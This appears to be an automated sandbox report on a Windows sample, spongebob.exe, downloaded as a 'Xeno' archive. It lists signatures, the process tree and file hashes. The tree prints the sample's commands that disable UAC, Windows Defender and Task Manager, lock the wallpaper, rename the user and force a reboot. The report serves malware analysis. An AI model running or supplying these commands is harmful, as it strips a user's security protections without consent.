Analysis

  • max time kernel
    39s
  • max time network
    41s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250502-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/05/2025, 15:14

Errors

Reason
Machine shutdown

General

  • Target

    https://gofile.io/d/ky2guY

Malware Config

Signatures

  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 17 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/ky2guY
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2392
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffee412dcf8,0x7ffee412dd04,0x7ffee412dd10
      2⤵
        PID:100
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1900,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2120 /prefetch:3
        2⤵
          PID:608
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2084,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2080 /prefetch:2
          2⤵
            PID:4056
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2360,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2512 /prefetch:8
            2⤵
              PID:3972
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3176 /prefetch:1
              2⤵
                PID:3880
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3216 /prefetch:1
                2⤵
                  PID:380
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4176,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4228 /prefetch:2
                  2⤵
                    PID:2396
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4588,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4716 /prefetch:1
                    2⤵
                      PID:4584
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4836,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3400 /prefetch:1
                      2⤵
                        PID:5716
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5376,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5392 /prefetch:8
                        2⤵
                          PID:1788
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5720,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5412 /prefetch:8
                          2⤵
                            PID:5636
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6068,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5936 /prefetch:8
                            2⤵
                              PID:2788
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5952,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4824 /prefetch:8
                              2⤵
                                PID:5000
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4708,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4820 /prefetch:8
                                2⤵
                                  PID:4356
                              • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                1⤵
                                  PID:1464
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                  1⤵
                                    PID:5944
                                  • C:\Windows\System32\rundll32.exe
                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                    1⤵
                                      PID:2380
                                    • C:\Users\Admin\Downloads\Xeno.ext\xeno-main\Spongebob\spongebob.exe
                                      "C:\Users\Admin\Downloads\Xeno.ext\xeno-main\Spongebob\spongebob.exe"
                                      1⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:380
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F2CC.tmp\SpongebobFuck.cmd""
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2836
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
                                          3⤵
                                          • Sets desktop wallpaper using registry
                                          • System Location Discovery: System Language Discovery
                                          PID:5540
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5516
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry key
                                          PID:5656
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                          3⤵
                                          • UAC bypass
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry key
                                          PID:5760
                                        • C:\Windows\SysWOW64\reg.exe
                                          Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                          3⤵
                                          • Modifies Windows Defender DisableAntiSpyware settings
                                          • System Location Discovery: System Language Discovery
                                          PID:5640
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry key
                                          PID:1380
                                        • C:\Windows\SysWOW64\net.exe
                                          net user Admin /fullname:"SPONGEBOB WAS HERE!!!"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1504
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB WAS HERE!!!"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5892
                                        • C:\Windows\SysWOW64\shutdown.exe
                                          shutdown /r /t 00
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1236
                                    • C:\Windows\system32\LogonUI.exe
                                      "LogonUI.exe" /flags:0x4 /state0:0xa3978855 /state1:0x41c64e6d
                                      1⤵
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of SetWindowsHookEx
                                      PID:2648
                                    • C:\Windows\System32\rundll32.exe
                                      C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                                      1⤵
                                        PID:1008

                                      Network

                                            MITRE ATT&CK Enterprise v16

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                              Filesize

                                              649B

                                              MD5

                                              b1cb8a94dec704b47d4357a3d577b684

                                              SHA1

                                              b53dd6824f19224a26c83469dd8c05a68b8181ac

                                              SHA256

                                              0d581e5d5b18dcb9ab67d0731677597aa29e8b7c95ceff7de255f67df70bf54a

                                              SHA512

                                              76852da76000a7fc30d2bad5c592addfd51661771e25c0907be9523449123fcb369ec23c5a2fd5599a92a993854edfa6c315aa3661863bce8cc688474ae7c383

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                              Filesize

                                              192B

                                              MD5

                                              6101f7cfc998328b462cac3b78ae48d8

                                              SHA1

                                              9155af2d1515b103582fe53a27f47e77f75e40a7

                                              SHA256

                                              1b7c0fd68aad28c11db2ddf6452679ba6d8a6041a4a1626e5ad6d3767f3f5247

                                              SHA512

                                              8abf656fe55c18d1a0502d449b850b34554128d03589ed699b595e9bdf5e99b38f4b8e69cfebe318bced441db9c980fe44a7c62c4d6d58ad9d486c021c7d46cb

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                              Filesize

                                              2B

                                              MD5

                                              d751713988987e9331980363e24189ce

                                              SHA1

                                              97d170e1550eee4afc0af065b78cda302a97674c

                                              SHA256

                                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                              SHA512

                                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                              Filesize

                                              10KB

                                              MD5

                                              aa3769a03fffccf110789ba6fee63d3f

                                              SHA1

                                              79c441b2e5484fb1932cf55faf1a8c84b80497fa

                                              SHA256

                                              94335ad66d50caa9dc5683748256d755c7c683341699386a54c95f1d2080e597

                                              SHA512

                                              f7ceb439a44bcf4e14c88af75b88ef3389bcb7b5df9b8b239cec00179653edb0fb6fd58dffc6a255ebd2fc7000b0f6cd9b8875b01288708b1adef241b0d1ca99

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                              Filesize

                                              15KB

                                              MD5

                                              e729efef0721795dcd37e91fefe504c8

                                              SHA1

                                              e6d9aeb11858ff7af01fbacc769df6efe776441c

                                              SHA256

                                              dd886131b239603bd651803f5e321850072bac71afa2c0f38ce33b6b2f9bca2c

                                              SHA512

                                              326ab39fe84c0a1d8efd371262742e83bd185359717178360e846fec312483eb826887733cdda30c9dc30c2e125efd048a8915707e91c9d83eb92c43cfbf6839

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                              Filesize

                                              72B

                                              MD5

                                              08b87f3ce7036b10e0232b701db5590c

                                              SHA1

                                              882453d94981393e60afd7f65120882ebcbbecbf

                                              SHA256

                                              e0500e09ecee1632954bc6e4bff1332c42ec28cc8419318e04427afa6bbd2a97

                                              SHA512

                                              a52b04040066fc10c270810f1d873100fbd5de4baf039e6ff9a809eda8fa9246cd57c918c28c03507d61f48314928be412b7c3d8c614afb714f337c3d11a12f9

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57d590.TMP

                                              Filesize

                                              48B

                                              MD5

                                              72e800a469b36b3e68016cb67e8a38c0

                                              SHA1

                                              dc4564d04822a4dd8fc51469f5d5d00e22362996

                                              SHA256

                                              95b83d5f50435d858656e2678b1e6da3340a1882c24dce6ef8e0b48ad8ffbe6c

                                              SHA512

                                              d7dcb7d5d2697f1d2be120dced3ed1b358b19098056eb7925f0a3a641333a1afc577537d57748bd0f1242c1b2505a7800eeba33cd9a9886afd46b97c3e09cd45

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                              Filesize

                                              79KB

                                              MD5

                                              563aa971a36891fe4d27aef0b3bfd23a

                                              SHA1

                                              0799cedd7d6f57c1e239fd3092c9941b163c2496

                                              SHA256

                                              405a766f9eee795fa2c3ca36ae867c6bc7c8a2ccbcf8aa43e21f6b5d746651d5

                                              SHA512

                                              3b8f45c0001ef3f81e8e827068624b0d3a92c2d9d2fcbb1c345fbcdc33514ddccb3d622d78a9c6ba835271dc275ff584174722378f34ab718b88bdc1efb4525d

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                              Filesize

                                              80KB

                                              MD5

                                              24d129fcb696a93574908da5ca988c78

                                              SHA1

                                              242f9ac3770a03cd020613eb1e3f04f968455723

                                              SHA256

                                              291ab33bb3cca864e8930e51ae648ea28e77a3e71984dfb1c33199713be4c239

                                              SHA512

                                              9520434ed3160e663cde53a9abea4af698b682c3a0bc3f188047e78e77d950df6bf3d7a6852b4d9058f194ce80567054c715620fe055ae17487c7d08bc304dd7

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                              Filesize

                                              80KB

                                              MD5

                                              a76c80abd3b724e6b5ecf9eb31dcba71

                                              SHA1

                                              285b506576c7745f393644339eecccfb8bf0ef29

                                              SHA256

                                              fb1334c8dbd9a049082e0c41367f64f35d7e5b7c9ed6773b2af8c8c694841757

                                              SHA512

                                              4b56c10c7b1b5b870f56cbae7f6f1bd5bcbaea2b6e0e5557b781dc8567084687c9685e380ea26d9029569ce6e1b6dc8693bfa621955686b596f6765dcc7699f2

                                            • C:\Users\Admin\AppData\Local\Temp\F2CC.tmp\MainWindow.exe

                                              Filesize

                                              92KB

                                              MD5

                                              03d8b31db1ed1294334b872f756ad1a1

                                              SHA1

                                              3f57aa9b9efb1ad9d576d799d9306abd4befdf89

                                              SHA256

                                              7e17dcaafc07877e720b3fc0e666ac69e2dce8e7458ae9b23902bcf5f8f2a40a

                                              SHA512

                                              55a979189ead8886c5fc3f35b927a80f8dff7a1d52136305c9efee7bc4f1b151d06348e75bef5b3203c47aaed98dc73692f097f7a967c64b9b743a5402012a86

                                            • C:\Users\Admin\AppData\Local\Temp\F2CC.tmp\SpongebobFuck.cmd

                                              Filesize

                                              11KB

                                              MD5

                                              7a918ed93f7fb297e05464edccc46756

                                              SHA1

                                              9464288fed7ba5d88928265882def5e05ffbe7db

                                              SHA256

                                              82fcb47b437dc1bedb77648755770b7cd9a29342fd2ab972c8bd063968d04604

                                              SHA512

                                              cb70d6023b4bf23f35646e399c4ca7f0ab11ebf0a1e44cf0627afaa4025676c2a20ab82ffa28ed4a196dc8cf56b33b104bf457cf21d750a163955927dcba3cb1

                                            • C:\Users\Admin\AppData\Local\Temp\F2CC.tmp\bg.bmp

                                              Filesize

                                              2.6MB

                                              MD5

                                              ce45a70d3cc2941a147c09264fc1cda5

                                              SHA1

                                              44cdf6c6a9ab62766b47caed1a6f832a86ecb6f9

                                              SHA256

                                              eceedadfde8506a73650cfa9a936e6a8fff7ffb664c9602bb14432aa2f8109ac

                                              SHA512

                                              d1bf6cdade55e9a7ce4243e41a696ae051835711f3d1e0f273ad3643f0b878266a8213cc13ca887a8181981ba4937350986e01e819b4bb109330718ef6251149

                                            • C:\Users\Admin\AppData\Local\Temp\F2CC.tmp\bobspeak.vbs

                                              Filesize

                                              131B

                                              MD5

                                              8884a25e47d799f6bd3d4ec20f05a3b7

                                              SHA1

                                              8959822be4ecff5dd7fbdd714cd85775345d39c5

                                              SHA256

                                              5a68437edd63bd826a1f1557121d4c05114c608fd8a18a0c9c156a60d90bd0c1

                                              SHA512

                                              3722494fda291fe85f9276dc656b49fb977eea6403cf3a0b6bfaa77c1ec74a70c2a3012e420129f3c1fd939ef7928d94f0320a128b7087fa8f4f4080ae70973b

                                            • C:\Users\Admin\AppData\Local\Temp\F2CC.tmp\mover.exe

                                              Filesize

                                              548KB

                                              MD5

                                              c1978e4080d1ec7e2edf49d6c9710045

                                              SHA1

                                              b6a87a32d80f6edf889e99fb47518e69435321ed

                                              SHA256

                                              c9e2a7905501745c304ffc5a70b290db40088d9dc10c47a98a953267468284a8

                                              SHA512

                                              2de11fdf749dc7f4073062cdd4881cf51b78e56cb27351f463a45c934388da2cda24bf6b71670b432c9fc039e24de9edd0e2d5382b67b2681e097636ba17626e

                                            • C:\Users\Admin\Downloads\Xeno.ext.zip.crdownload

                                              Filesize

                                              7.3MB

                                              MD5

                                              f0bc760a442d651bf4eb6ed08856bb18

                                              SHA1

                                              f363e350b8aebbff036517ded088e177de97cb14

                                              SHA256

                                              783829dfcd09317c8916249301ecf11236d160d62b7441d812d41817d1900eb4

                                              SHA512

                                              7faf0dd31e1201cd81db11715bc2b230c6845bf608268aa3bfd087d60bc17e909dcaab9461aa1f4a20383fe89ed4025641aa546ea37edca930eff00cb514b76c

                                            • C:\Users\Public\Desktop\NOESCAPE3131.vbs

                                              Filesize

                                              38B

                                              MD5

                                              7c0b3ef9968d114404d5cb1ef66eae49

                                              SHA1

                                              78fd3c71458513f6ac905427a5d0fcf4e535ee69

                                              SHA256

                                              b765f9b09b6c3d040c96e9b09eca1ed1a8bc3f980ba09beabc0a8df726181bbf

                                              SHA512

                                              ce42bf92bf7ee7d905463329f5f24dbf46b39d041e386343492825eac86bdfb917babd94df21eb5fee4f0f0b205c218ac1b17c4857763d5786c3cf8b96e347c9

                                            • memory/380-109-0x0000000000400000-0x00000000007BF000-memory.dmp

                                              Filesize

                                              3.7MB

                                            • memory/380-239-0x0000000000400000-0x00000000007BF000-memory.dmp

                                              Filesize

                                              3.7MB